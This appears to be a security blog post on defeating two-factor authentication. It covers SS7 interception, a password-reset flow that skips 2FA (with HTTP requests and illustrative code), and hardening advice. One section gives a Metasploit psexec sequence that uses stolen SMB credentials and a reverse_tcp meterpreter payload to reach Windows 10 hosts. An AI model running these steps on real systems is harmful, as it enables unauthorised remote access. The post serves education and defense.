So, you know what 2FA is, right?
Well, the hard theory says:
- ‘Authentication is understood as the procedure to ensure that a person is who he claims to be’.
DISCLAIMER: In this blog post, SecSignal assumes that, via different attack vectors, the Assessment Team already holds credentials that pass the first authentication step, and needs a way to defeat the second factor.
Well, let’s start. For a user, there are three ways to confirm this ‘authenticity’:
- By something that the user knows, like a numeric password.
- By something that the user has, like a hard token.
- By something that the user owns (a biometric trait), like the iris of an eye.
Normally, when a user authenticates to a system, only one of the methods above is requested, the first being the most common. When the user’s password is stolen, that single layer is gone and the account is completely exposed. This is where 2FA adds a new security layer: it is as simple as requiring a second factor (like those listed above) on top of the first. ‘Now, attackers not only have to know my password, they MUST have something that I own.’
And, how does it work and where can I deploy it?
There is no fixed environment: any system that already implements the first security layer can deploy a second factor, with more or less complexity. For example, when a user makes a transaction through home banking, he is not only asked for his password; he also has to use a ‘coordinate card’ or a ‘soft token’ as an extra security layer. That is an example of 2FA, and maybe you didn’t even realize it!
Companies also offer solutions.
2FA is NOT a new trending topic. It has been in development for a long time and is actively implemented in many public environments; not surprisingly, big companies have their own deployments. Let’s review some examples:
- Our favorite social networks, like Facebook and Twitter.
- Our mail accounts.
- And why not, our bank accounts.
- Finally, have you seen this in any movie?
And obviously, there are public vulnerabilities.
As in every area of security, whenever new protection techniques are implemented, researchers find ways to exploit them; from web applications to infrastructure platforms, this happens all the time. One interesting point about attacking 2FA: the attacker does not only target a certain technology or platform (as with any implementation); the attack also points directly at the end user’s own security.
Some publicly disclosed attacks on different implementations are reviewed below, starting with 2FA based on text messages:
- In mid-2017, a series of vulnerabilities were found in the SS7 protocol (Signaling System 7). This protocol allows interoperation between carriers (put simply, it is what lets text messages be sent and received from any part of the world). Over the course of a few years, multiple vulnerabilities have been disclosed, such as message interception. In this particular scenario, the attacker could redirect an OTP message to another number.
This technique is really difficult to exploit (but not impossible), and several pieces of information are required:
- The attacker MUST know the username and password (the first factor…).
- The attacker MUST know the victim’s phone number, in order to redirect the SMS.
- With this information gathered, it is possible to take control of the compromised account.
NOTE: For further information, please read the following link: https://www.ptsecurity.com/upload/ptcom/SS7_WP_A4.ENG.0036.01.DEC.28.2014.pdf
- Another ‘vulnerability’ of SMS-based authentication is the push notification sent to the mobile device. Although it is not a vulnerability in a protocol like the previous case, this technique relies on a series of misconfigurations, explained below:
- SMS notifications are enabled automatically and they allow a ‘preview’ of the message.
- An attacker who knows the victim’s telephone number and has physical access to the device (even if it is locked) can read the security code, because it is shown in the preview.
- Many applications set up 2FA via QR codes (for example LastPass and Gmail). In mid-2017, LastPass generated a QR code containing a ‘secret’ (crypto-challenge) that the user’s app used to generate valid 2FA codes. This QR code was stored under a URL that could be derived from the user’s password. This means that an attacker who had a user’s password could also compromise the 2FA.
- Also, it was possible to deactivate the 2FA through CSRF attacks, delivered for example by phishing.
These were examples of exploiting the alternatives to a password, breaking the ‘something that you have’ factor. Now, here are some examples of exploiting the ‘something you own’ factor:
- A common implementation of this factor is the fingerprint reader on smartphones, used for example when purchasing an app. In this case, images containing the model of the fingerprint are stored in the phone’s DB. When the user presents his finger, the new fingerprint image is compared to the stored one. Over time, various techniques (reminiscent of science-fiction movies) have been developed to skip this verification, for example:
- Using a high-resolution camera, the attacker tries to obtain a photograph of the victim’s fingerprint.
- Using laser printers, the attacker creates a mold that reproduces the layers of skin. In these scenarios, glue and glycerol are usually used to simulate human skin and retain the impression.
And now, why don’t we exploit one of these implementations? Real PoC #1.
In this case, we will explain a vulnerability that was widely exploited on the Internet. It is still common to find this poor configuration in custom implementations today. We are facing a website which, obviously, supports 2FA. The application, like almost all apps, implements password reset functionality, and that will be our point of impact.
Most web applications work in the following way:
- The user forgets his password and asks for a password reset.
- An email is sent to the user, containing a unique code.
- The user changes his password and is redirected to the homepage.
So, did you realise where the 2FA bypass is? In the last step, when the new password is submitted, the user is logged in without ever being prompted for the 2FA, so it is bypassed.
Additionally, in order to exploit the lack of 2FA in the password reset mechanism, it is necessary to have gained access to the victim’s email beforehand. This could be achieved via phishing emails or by reusing the password obtained for the first factor. The following image shows a password reset email. Below it, the request for ‘Recover your password’ is loading.
GET /resetpassword.html?token=eyJhbGciOiJub25lIn0.eyJodG1sVGVtcGxhdGUiOiJyZXNldC1wYXNzd29yZCIsImFjdGlvbiI6IklOVEVSTkFMX1JFU0VUX1BBU1NXT1JEIiwiY2FsbGJhY2tVcmwiOiJodHRwczovL2hhY2tlZDJmYS5jb20vcmVzZXRwYXNzd29yZC5odG1sIiwiZXhwaXJhdGlvbiI6MTQzMCwiZXhwIjoxNTE4MjkzMTI0LCJ1c2VySWQiOiJqdXN0dGVzdGluZ0AyZmEuY29tIiwiZW1haWwiOiJqdXN0dGVzdGluZ0AyZmEuY29tIiwibm90aWZpY2F0aW9uVGVtcGxhdGVDb2RlIjoiaW50ZXJuYWxyZXNldHBhc3MifQ.2huNQs1KM07jErbbeQ9nJjawFmCj9g31noz4j6X61uY&[email protected]&action=INTERNAL_RESET_PASSWORD&htmlTemplate=resetpassword HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
So, nothing is odd here. Now, it’s time to fill the form and send our new password.
POST /newPassword HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/plain, */*
So, here the vulnerability is exploited. Instead of a redirection to /login, the application sends us to our /home page, bypassing the 2FA implementation.
HTTP/1.1 302 Found
Date: Another day on Earth GMT
When the password is updated in the DB, the user MUST be redirected to authenticate again, so he has to send his new password and, of course, the 2FA.
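A minimal model of the reset flow above, added here as an illustration (it is not the vulnerable site’s code): `reset_vulnerable` reproduces what the captured requests show, a /newPassword handler that creates a fully authenticated session and answers with a 302 to /home, while `reset_fixed` applies the rule just stated. The user, the token store and the session store are constructed in memory for the demo.

```python
import hashlib
import secrets
import time

# Constructed in-memory stores for the demo; a real app would use its database.
USERS = {"user@example.com": {"pw_hash": b"", "salt": b"", "mfa_enrolled": True}}
RESET_TOKENS = {}   # token -> (user, expiry timestamp)
SESSIONS = {}       # session id -> {"user", "password_ok", "mfa_ok"}

def _set_password(user: str, new_pw: str) -> None:
    """Store a salted PBKDF2 hash of the new password."""
    salt = secrets.token_bytes(16)
    USERS[user]["salt"] = salt
    USERS[user]["pw_hash"] = hashlib.pbkdf2_hmac("sha256", new_pw.encode(), salt, 100_000)

def issue_reset_token(user: str, ttl: int = 600) -> str:
    """Unguessable, time-limited token for the 'Recover your password' email."""
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[token] = (user, time.time() + ttl)
    return token

def _consume_token(token: str) -> str:
    """Tokens are single use: pop() removes them; KeyError if unknown or reused."""
    user, expiry = RESET_TOKENS.pop(token)
    if time.time() > expiry:
        raise ValueError("reset token expired")
    return user

def reset_vulnerable(token: str, new_pw: str):
    """The flow captured in the post: /newPassword logs the user straight in."""
    user = _consume_token(token)
    _set_password(user, new_pw)
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "password_ok": True, "mfa_ok": True}  # 2FA never checked
    return sid, "/home"          # 302 to /home: the second factor is skipped

def reset_fixed(token: str, new_pw: str):
    """Hardened flow: change the password, revoke every session, send the user to /login."""
    user = _consume_token(token)
    _set_password(user, new_pw)
    for sid in [s for s, v in SESSIONS.items() if v["user"] == user]:
        del SESSIONS[sid]        # any session opened with the old password dies with it
    return None, "/login"        # no session: password AND 2FA must be presented again

def authorize(sid) -> bool:
    """Gate for /home: the session must carry both factors when the user has 2FA enrolled."""
    s = SESSIONS.get(sid)
    if s is None or not s["password_ok"]:
        return False
    return s["mfa_ok"] or not USERS[s["user"]]["mfa_enrolled"]
```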
Now, let’s hit Windows. Real PoC #2 & #3
Another (and more realistic) example is 2FA implemented with Windows 10.
[#] Setting up 2FA in Windows 10 & Outlook.
You can link your Microsoft account with Windows 10 so that, at authentication time, you are asked for your Outlook/Hotmail password. Obviously, if you have set up 2FA, it is prompted too. Here are the steps for enabling 2FA on Hotmail/Outlook, and then how to use it in Windows 10:
- First, log in to your account following this link. It will redirect you to the advanced configuration of your account.
- In the middle of the page is the option for Set up Two-Step Verification.
- You can verify your identity with multiple options. In my case, I chose ‘An app’.
- You will have to download Authenticator for iOS, Android or Windows Phone and continue with the process. It depends on which platform you have chosen. For iOS/Windows Phone you will have to scan a QR code with Authenticator; for Android, you just have to log in with the account that you want to pair.
Once you have done that, it’s time to go to our Windows 10 machine:
- Go to Windows Settings -> Accounts -> Your Info -> Manage my Microsoft accounts.
- You have to log in with your Hotmail account and then you will be asked for your 2FA (which was configured before).
- Now, every time you authenticate through Windows 10, your password & 2FA will be prompted.
[#] What are we going to abuse? Let’s make a PoC too.
SMB (Server Message Block) is a client-server, request-response protocol for sharing files, printers, ports and many other things. Commonly, clients connect to servers using TCP/IP. Once they have established a connection, clients can send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sorts of things you want to do with a file system.
SMB can run over the session and transport layers in several ways:
- Directly over TCP, on port 445.
- Via the NetBIOS API, which in turn can run on the transport layer:
- On UDP ports 137/138 and TCP ports 137/139.
By default, the SMB protocol does not support 2FA, so other countermeasures have to be implemented to protect it. Next, a technique is presented to bypass the default 2FA implementation in Windows 10.
[#] We have our target, now we need the weapon.
What we need is a tool for communicating over SMB that enables remote administration of our target. For this task, PsExec is our best utility. Again, the hard theory says that PsExec is:
“Mark Russinovich wrote this utility as part of his sysInternals suite in the late 90s to help Windows Administrators perform important tasks, for example to execute commands or run executables on remote systems. The PSExec utility requires a few things on the remote system: the Server Message Block (SMB) service must be available and reachable (e.g. not blocked by firewall); File and Print Sharing must be enabled; and Simple File Sharing must be disabled.”
So this is exactly what we need.
[#] Exploiting the bug
Assuming (as stated in the disclaimer at the beginning of the blog post) that we have already compromised a valid username and password, it is now time to exploit the user’s machine remotely.
Our utility, PsExec, is available as a Metasploit module. Once Metasploit has opened, let’s load it:
$ msf > use exploit/windows/smb/psexec
Now, we just have to complete the following statements:
$ msf > set SMBUser [username]
$ msf > set SMBPass [password]
$ msf > set RHOST [target host]
$ msf > set RPORT [target port]
$ msf > set payload windows/meterpreter/reverse_tcp
And that’s all. Now see how we can authenticate to the affected host without the 2FA.
[#] And is there any protection against this?
In order to prevent an attacker from bypassing your 2FA controls in this way, the following steps can be implemented:
- If it is not necessary, turn off file and printer sharing.
- Block traffic on ports 445, 139 and 135. Even the Windows firewall can perform this task.
- Configure just one local administrator account with a strong password and remove it from the domain.
- If PowerShell is enabled but not necessary, disable it.
[#] Another note -> PoC #3
If you don’t have a Microsoft account, a lot of 2FA services are available. For this scenario, we will focus on a certain product:
To set it up, first download the app for your mobile from the following link:
Then install the desktop client from https://saaspass.com/downloads.html on your Windows 10 machine. For pairing, your computer will ask for your SAASID (it is in your mobile app) and everything is ready.
And, how do I exploit this flaw and how can I mitigate it?
Well, the steps are the same as the example above with the Hotmail/Outlook account!
Custom implementations must be aware of these attacks. Here are some recommendations.
We will list each authentication factor with a series of recommendations, discussing what you should protect and what you should control, to implement both as safely as possible:
- Something you know. The general recommendations for passwords:
- Set a minimum length (more than 8 characters).
- Require numbers, letters and at least one special character.
- Lock the account after 5 failed attempts.
- These simple recommendations help prevent dictionary and brute-force attacks on passwords.
- Something you have:
- When using hard/soft tokens, generate codes of at least 6 digits.
- The code should expire after 1 minute.
- The code should expire after it is used.
- The code must not be predictable (always random numbers, with no mathematical relation between them).
- After 3 failed attempts, the code should be invalidated.
- These simple recommendations help prevent guessing the code and limit brute-force attacks (for example, the code is ONE valid number among 600000 possibilities, and the attacker has just 3 attempts).
- Something you own. These security techniques require a lot of knowledge. Here, we outline an iris recognition algorithm:
- Locate the iris correctly.
- Adjust the contours of the iris using the RANSAC technique (Random Sample Consensus).
- Normalize and enhance the iris.
- Perform a ‘polar’ transformation and equalize the histogram.
- Extract data from the iris via cross-correlation methods.
- Verify matches using the PSR (Peak to Sidelobe Ratio) as a measure of similarity.
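The ‘something you have’ rules above (6 random digits, 1-minute lifetime, single use, invalidated after 3 failures) as a small server-side code store, added here as an example and not taken from any product mentioned on this page; the user names and the injectable clock are constructed for the demo.

```python
import secrets
import time

OTP_DIGITS = 6          # "at least 6 digits"
OTP_TTL_SECONDS = 60    # "after 1 minute, the code should expire"
MAX_ATTEMPTS = 3        # "after 3 failed attempts, the code should be invalidated"

class OtpStore:
    """Issues and checks one-time codes under the rules above. One outstanding code per
    user; the clock is injectable so expiry can be tested without sleeping."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._codes = {}   # user -> {"code", "expires", "attempts"}

    def issue(self, user: str) -> str:
        # CSPRNG, zero-padded: every value in 000000..999999 is equally likely,
        # so there is no mathematical logic linking one code to the next.
        code = f"{secrets.randbelow(10 ** OTP_DIGITS):0{OTP_DIGITS}d}"
        self._codes[user] = {"code": code,
                             "expires": self._clock() + OTP_TTL_SECONDS,
                             "attempts": 0}
        return code

    def verify(self, user: str, candidate: str) -> bool:
        entry = self._codes.get(user)
        if entry is None:
            return False                   # never issued, already used, expired or invalidated
        if self._clock() > entry["expires"]:
            del self._codes[user]          # rule: expire after 1 minute
            return False
        # constant-time comparison; non-ASCII input simply counts as a wrong guess
        ok = candidate.isascii() and secrets.compare_digest(entry["code"], candidate)
        if ok:
            del self._codes[user]          # rule: expire after use
            return True
        entry["attempts"] += 1
        if entry["attempts"] >= MAX_ATTEMPTS:
            del self._codes[user]          # rule: 3 failures burn the code; a new one must be requested
        return False
```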
And, if you don’t want an ad-hoc solution, here are other recommendations.
In case you do not want to implement an ad-hoc solution, here we show how to integrate the solutions offered by the market with everyday applications:
- Google Authenticator is one of the most widely used nowadays, providing 2FA protection for Google services. Many companies use Google mail servers as their corporate mail solution, so using 2FA in this scenario is extremely important.
- Synchronization is very simple. Once authenticated in your account, Google sends a text message to the phone you indicate, to make sure that the mobile device is yours and only you have access to it. Once validated, the Google Authenticator app shows the name of your synchronized account and a series of numbers (OTP) that change every minute.
- If you want to keep your second factors organized in a single place, there are applications that manage all of them centrally. Duo Mobile supports a series of services (such as Amazon, Slack, Microsoft and others), allowing all 2FA codes to be stored in a single application and generated centrally, working as a 2FA manager. You only have to indicate which service you want to register and the different access codes will be generated.